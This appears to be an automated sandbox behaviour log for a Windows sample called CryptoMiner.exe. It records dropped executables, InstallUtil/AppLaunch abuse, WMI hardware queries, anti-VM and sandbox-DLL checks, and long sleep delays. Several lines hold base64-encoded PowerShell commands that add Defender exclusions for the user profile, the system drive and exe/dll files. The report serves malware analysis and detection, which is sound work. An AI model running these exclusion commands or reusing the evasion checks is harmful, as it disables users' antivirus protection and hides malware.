                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                    Source: C:\Users\user\Desktop\CryptoMiner.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\AppData\Local\Temp\fname.exe "C:\Users\user\AppData\Local\Temp\fname.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\AppData\Local\Temp\filename.exe "C:\Users\user\AppData\Local\Temp\filename.exe"
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                    Source: C:\Users\user\Desktop\CryptoMiner.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Temp\fname.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\filename.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: 0.3.CryptoMiner.exe.d730000.0.unpack, SystemNetSecurityPackageInfoP.cs Base64 encoded string: [long base64 blob removed]
                    Source: 0.3.CryptoMiner.exe.d730000.1.unpack, SystemNetSecurityPackageInfoP.cs Base64 encoded string: [long base64 blob removed]
                    Source: 12.0.InstallUtil.exe.400000.0.unpack, SystemNetSecurityPackageInfoP.cs Base64 encoded string: [long base64 blob removed]
                    Source: 12.2.InstallUtil.exe.400000.0.unpack, SystemNetSecurityPackageInfoP.cs Base64 encoded string: [long base64 blob removed]
                    Source: 12.0.InstallUtil.exe.400000.1.unpack, SystemNetSecurityPackageInfoP.cs Base64 encoded string: [long base64 blob removed]
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6712:120:WilError_01
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Mutant created: \Sessions\1\BaseNamedObjects\9D16FBEF0D8A8F87529DE06A1C43C737
                    Source: filename.exe.12.dr, u206c???????????????????????????????????????.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: 20.3.fname.exe.2f70000.0.unpack, u0002u2002.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: 22.2.AppLaunch.exe.400000.0.unpack, u0002u2002.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: CryptoMiner.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                    Source: CryptoMiner.exe Static file information: File size 1579064 > 1048576
                    Source: CryptoMiner.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x11f400
                    Source: CryptoMiner.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: CryptoMiner.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: CryptoMiner.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: CryptoMiner.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: CryptoMiner.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: CryptoMiner.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: CryptoMiner.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: C:\At8uAy02fG4K0d\a4ma7t7o\T3MNiT0siyfS.pdb source: CryptoMiner.exe
                    Source: Binary string: s.pdB source: filename.exe.12.dr
                    Source: C:\Users\user\Desktop\CryptoMiner.exe Code function: 0_2_00D72808 pushad ; iretd
                    Source: C:\Users\user\Desktop\CryptoMiner.exe Code function: 0_2_00D731DA push EF3FEFD4h; iretd
                    Source: C:\Users\user\Desktop\CryptoMiner.exe Code function: 0_2_00D78956 push ebx; iretd
                    Source: C:\Users\user\Desktop\CryptoMiner.exe Code function: 0_2_00D9D6A5 push ecx; ret
                    Source: C:\Users\user\Desktop\CryptoMiner.exe Code function: 0_2_00D99635 push ecx; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 12_2_06978220 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 12_2_0697D3EA push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 12_2_0697F132 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 12_2_06977FA0 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 12_2_06979F5F pushfd ; iretd
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 12_2_06CD8770 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 12_2_06CDA231 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 12_2_06CD0E80 push eax; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 12_2_06CDA991 push es; ret
                    Source: C:\Users\user\AppData\Local\Temp\filename.exe Code function: 23_2_00007FF9EFE46433 push ebx; iretd
                    Source: C:\Users\user\AppData\Local\Temp\filename.exe Code function: 23_2_00007FF9EFE47765 push ecx; iretd
                    Source: C:\Users\user\AppData\Local\Temp\filename.exe Code function: 23_2_00007FF9EFE4770A push ecx; iretd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_00007FF9EFE44FFD push eax; iretd
                    Source: C:\Users\user\Desktop\CryptoMiner.exe Code function: 0_2_00DA5E29 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: fname.exe.12.dr Static PE information: section name: JICeboQ
                    Source: fname.exe.12.dr Static PE information: section name: zcPlt
                    Source: fname.exe.12.dr Static PE information: section name: rrF5ta
                    Source: fname.exe.12.dr Static PE information: section name: IKbga
                    Source: fname.exe.12.dr Static PE information: section name: 03AAoc
                    Source: fname.exe.12.dr Static PE information: section name: 6maTqw
                    Source: fname.exe.12.dr Static PE information: section name: PKmYta
                    Source: fname.exe.12.dr Static PE information: section name: gTx1qw
                    Source: fname.exe.12.dr Static PE information: section name: 9YRtc
                    Source: initial sample Static PE information: section where entry point is pointing to: gTx1qw
                    Source: filename.exe.12.dr Static PE information: real checksum: 0x0 should be: 0x4b37c4
                    Source: fname.exe.12.dr Static PE information: real checksum: 0x2ff should be: 0x388ceb
                    Source: initial sample Static PE information: section name: .text entropy: 7.61191579951
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Temp\filename.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Temp\fname.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Local\Temp\fname.exeSystem information queried: FirmwareTableInformation
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: CryptoMiner.exe, 00000000.00000002.548299358.00000000007EA000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ~DBGHELP.DLLPSTOREC.DLLDIR_WATCH.DLLAPI_LOG.DLLCMDVRT64.DLLCMDVRT32.DLLSBIEDLL.DLLBGAGENT.DLL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5052Thread sleep time: -23058430092136925s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1500Thread sleep count: 1207 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1500Thread sleep count: 3018 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\CryptoMiner.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                    Source: C:\Users\user\Desktop\CryptoMiner.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4771
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1207
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3018
                    Source: C:\Users\user\Desktop\CryptoMiner.exeAPI coverage: 6.4 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\CryptoMiner.exeAPI call chain: ExitProcess graph end node
